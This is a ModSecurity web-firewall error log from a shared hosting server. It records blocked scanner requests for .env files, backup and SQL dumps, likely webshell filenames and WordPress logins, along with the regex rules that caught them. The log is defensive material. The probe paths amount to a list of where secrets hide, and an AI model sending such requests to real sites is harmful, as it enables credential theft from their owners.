[Tue May 26 19:50:05.168498 2026] [security2:error] [pid 86490:tid 86679] [client 185.177.72.53:61844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/node-app/src/.env"] [unique_id "ahWsFVZMwN0DpLVWo6KJ9gAAAMA"]
[Tue May 26 19:50:05.254521 2026] [security2:error] [pid 86490:tid 86628] [client 4.197.75.18:3991] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/wp-mail.php"] [unique_id "ahWsFVZMwN0DpLVWo6KJ-AAAAI0"]
[Tue May 26 19:50:05.254617 2026] [security2:error] [pid 86490:tid 86628] [client 4.197.75.18:3991] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/wp-mail.php"] [unique_id "ahWsFVZMwN0DpLVWo6KJ-AAAAI0"]
[Tue May 26 19:50:05.500914 2026] [security2:error] [pid 86490:tid 86629] [client 185.177.72.53:61844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/service/.env"] [unique_id "ahWsFVZMwN0DpLVWo6KJ_QAAAI4"]
[Tue May 26 19:50:05.662770 2026] [security2:error] [pid 86490:tid 86639] [client 185.177.72.53:61844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mail/.env"] [unique_id "ahWsFVZMwN0DpLVWo6KKAwAAAJg"]
[Tue May 26 19:50:05.825332 2026] [security2:error] [pid 86490:tid 86704] [client 185.177.72.53:61844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/blog-app/server/.env"] [unique_id "ahWsFVZMwN0DpLVWo6KKCQAAANk"]
[Tue May 26 19:50:06.153387 2026] [security2:error] [pid 86490:tid 86732] [client 185.177.72.53:61844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/v3/.env"] [unique_id "ahWsFlZMwN0DpLVWo6KKFAAAAPU"]
[Tue May 26 19:50:06.277921 2026] [autoindex:error] [pid 86490:tid 86642] [client 199.45.154.159:34202] AH01276: Cannot serve directory /home1/omshriin/public_html/omshriinfra.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:50:06.315140 2026] [security2:error] [pid 86490:tid 86745] [client 185.177.72.53:61844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/laravel-app/src/.env"] [unique_id "ahWsFlZMwN0DpLVWo6KKHgAAAQI"]
[Tue May 26 19:50:06.477863 2026] [security2:error] [pid 86490:tid 86734] [client 185.177.72.53:61844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/logs/error/.env"] [unique_id "ahWsFlZMwN0DpLVWo6KKIwAAAPc"]
[Tue May 26 19:50:06.640961 2026] [security2:error] [pid 86490:tid 86647] [client 185.177.72.53:61844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/credentials.yml~"] [unique_id "ahWsFlZMwN0DpLVWo6KKJwAAAKA"]
[Tue May 26 19:50:06.749167 2026] [security2:error] [pid 86490:tid 86694] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsFlZMwN0DpLVWo6KKHwAAAM8"]
[Tue May 26 19:50:06.804310 2026] [security2:error] [pid 86490:tid 86649] [client 185.177.72.53:61844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/public/database.bak"] [unique_id "ahWsFlZMwN0DpLVWo6KKKwAAAKI"]
[Tue May 26 19:50:07.297925 2026] [security2:error] [pid 86490:tid 86630] [client 185.177.72.53:61844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/Helmetjs/.env"] [unique_id "ahWsF1ZMwN0DpLVWo6KKPwAAAI8"]
[Tue May 26 19:50:07.314613 2026] [security2:error] [pid 86490:tid 86515] [remote 46.20.146.46:36848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWsF1ZMwN0DpLVWo6KKNgAAkRg"]
[Tue May 26 19:50:07.404120 2026] [security2:error] [pid 86490:tid 86667] [client 4.197.75.18:3322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/leaf.php"] [unique_id "ahWsF1ZMwN0DpLVWo6KKQwAAALQ"]
[Tue May 26 19:50:07.404224 2026] [security2:error] [pid 86490:tid 86667] [client 4.197.75.18:3322] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/leaf.php"] [unique_id "ahWsF1ZMwN0DpLVWo6KKQwAAALQ"]
[Tue May 26 19:50:07.832837 2026] [security2:error] [pid 86490:tid 86544] [remote 46.20.146.46:36848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWsF1ZMwN0DpLVWo6KKRgAA_DU"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:50:08.447957 2026] [security2:error] [pid 86490:tid 86694] [client 185.177.72.53:61844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/subscription/.env"] [unique_id "ahWsGFZMwN0DpLVWo6KKYQAAAM8"]
[Tue May 26 19:50:08.469915 2026] [security2:error] [pid 86490:tid 86733] [client 4.197.75.18:3288] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/grsiuk.php"] [unique_id "ahWsGFZMwN0DpLVWo6KKZQAAAPY"]
[Tue May 26 19:50:08.470000 2026] [security2:error] [pid 86490:tid 86733] [client 4.197.75.18:3288] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/grsiuk.php"] [unique_id "ahWsGFZMwN0DpLVWo6KKZQAAAPY"]
[Tue May 26 19:50:08.611390 2026] [security2:error] [pid 86490:tid 86677] [client 185.177.72.53:61844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backup/wp-config.sql"] [unique_id "ahWsGFZMwN0DpLVWo6KKZgAAAL4"]
[Tue May 26 19:50:09.186786 2026] [security2:error] [pid 86490:tid 86664] [client 4.197.75.18:3327] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/8.php"] [unique_id "ahWsGVZMwN0DpLVWo6KKgQAAALE"]
[Tue May 26 19:50:09.186918 2026] [security2:error] [pid 86490:tid 86664] [client 4.197.75.18:3327] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/8.php"] [unique_id "ahWsGVZMwN0DpLVWo6KKgQAAALE"]
[Tue May 26 19:50:09.760231 2026] [security2:error] [pid 86490:tid 86686] [client 185.177.72.53:61844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api.php.old"] [unique_id "ahWsGVZMwN0DpLVWo6KKlQAAAMc"]
[Tue May 26 19:50:09.954090 2026] [security2:error] [pid 86490:tid 86669] [client 4.197.75.18:3321] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/fs.php"] [unique_id "ahWsGVZMwN0DpLVWo6KKpAAAALY"]
[Tue May 26 19:50:09.954212 2026] [security2:error] [pid 86490:tid 86669] [client 4.197.75.18:3321] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/fs.php"] [unique_id "ahWsGVZMwN0DpLVWo6KKpAAAALY"]
[Tue May 26 19:50:10.156176 2026] [security2:error] [pid 86490:tid 86622] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsGVZMwN0DpLVWo6KKlAAAAIc"]
[Tue May 26 19:50:10.579798 2026] [security2:error] [pid 86490:tid 86725] [client 185.177.72.53:61844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.config/.env"] [unique_id "ahWsGlZMwN0DpLVWo6KKuwAAAO4"]
[Tue May 26 19:50:10.751451 2026] [security2:error] [pid 86490:tid 86638] [client 51.68.111.204:30581] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "thegoodsporting.com"] [uri "/robots.txt"] [unique_id "ahWsGlZMwN0DpLVWo6KKwwAAAJc"]
[Tue May 26 19:50:10.751619 2026] [security2:error] [pid 86490:tid 86638] [client 51.68.111.204:30581] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "thegoodsporting.com"] [uri "/robots.txt"] [unique_id "ahWsGlZMwN0DpLVWo6KKwwAAAJc"]
[Tue May 26 19:50:10.869498 2026] [security2:error] [pid 86490:tid 86683] [client 4.197.75.18:3307] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/ws38.php"] [unique_id "ahWsGlZMwN0DpLVWo6KKxwAAAMQ"]
[Tue May 26 19:50:10.869680 2026] [security2:error] [pid 86490:tid 86683] [client 4.197.75.18:3307] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/ws38.php"] [unique_id "ahWsGlZMwN0DpLVWo6KKxwAAAMQ"]
[Tue May 26 19:50:11.070549 2026] [security2:error] [pid 86490:tid 86730] [client 185.177.72.53:61844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/backup/log.sql"] [unique_id "ahWsG1ZMwN0DpLVWo6KKzAAAAPM"]
[Tue May 26 19:50:11.255036 2026] [security2:error] [pid 86490:tid 86553] [remote 217.112.89.35:43752] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWsG1ZMwN0DpLVWo6KKzQAAmD4"]
[Tue May 26 19:50:11.600817 2026] [security2:error] [pid 86490:tid 86669] [client 4.197.75.18:3290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/a7.php"] [unique_id "ahWsG1ZMwN0DpLVWo6KK4AAAALY"]
[Tue May 26 19:50:11.600928 2026] [security2:error] [pid 86490:tid 86669] [client 4.197.75.18:3290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/a7.php"] [unique_id "ahWsG1ZMwN0DpLVWo6KK4AAAALY"]
[Tue May 26 19:50:12.272913 2026] [security2:error] [pid 86490:tid 86651] [client 4.197.75.18:3267] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/classsmtps.php"] [unique_id "ahWsHFZMwN0DpLVWo6KK_gAAAKQ"]
[Tue May 26 19:50:12.273025 2026] [security2:error] [pid 86490:tid 86651] [client 4.197.75.18:3267] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/classsmtps.php"] [unique_id "ahWsHFZMwN0DpLVWo6KK_gAAAKQ"]
[Tue May 26 19:50:12.383549 2026] [security2:error] [pid 86490:tid 86724] [client 185.177.72.53:61844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/blog/.env"] [unique_id "ahWsHFZMwN0DpLVWo6KLCAAAAO0"]
[Tue May 26 19:50:12.618610 2026] [security2:error] [pid 86490:tid 86596] [remote 46.20.146.46:45068] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWsHFZMwN0DpLVWo6KLEAAApWk"]
[Tue May 26 19:50:12.704590 2026] [security2:error] [pid 86490:tid 86640] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsHFZMwN0DpLVWo6KLBAAAAJk"]
[Tue May 26 19:50:13.366645 2026] [security2:error] [pid 86490:tid 86623] [client 185.177.72.53:61844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/solr/.env"] [unique_id "ahWsHVZMwN0DpLVWo6KLKgAAAIg"]
[Tue May 26 19:50:13.528364 2026] [security2:error] [pid 86490:tid 86673] [client 185.177.72.53:61844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/server/src/persistence/.env"] [unique_id "ahWsHVZMwN0DpLVWo6KLLgAAALo"]
[Tue May 26 19:50:14.395533 2026] [security2:error] [pid 86490:tid 86695] [client 4.197.75.18:3357] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/amax.php"] [unique_id "ahWsHlZMwN0DpLVWo6KLTQAAANA"]
[Tue May 26 19:50:14.395658 2026] [security2:error] [pid 86490:tid 86695] [client 4.197.75.18:3357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/amax.php"] [unique_id "ahWsHlZMwN0DpLVWo6KLTQAAANA"]
[Tue May 26 19:50:14.671233 2026] [security2:error] [pid 86490:tid 86557] [remote 46.20.146.46:45068] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWsHlZMwN0DpLVWo6KLWQAA5EI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:50:14.729081 2026] [security2:error] [pid 86490:tid 86603] [remote 101.100.249.238:42434] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.249.100.101.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahWsHlZMwN0DpLVWo6KLVAAAsXA"]
[Tue May 26 19:50:15.310327 2026] [security2:error] [pid 86490:tid 86719] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/services/graylog/.env"] [unique_id "ahWsH1ZMwN0DpLVWo6KLegAAAOg"]
[Tue May 26 19:50:15.390860 2026] [security2:error] [pid 86490:tid 86634] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsHlZMwN0DpLVWo6KLbQAAAJM"]
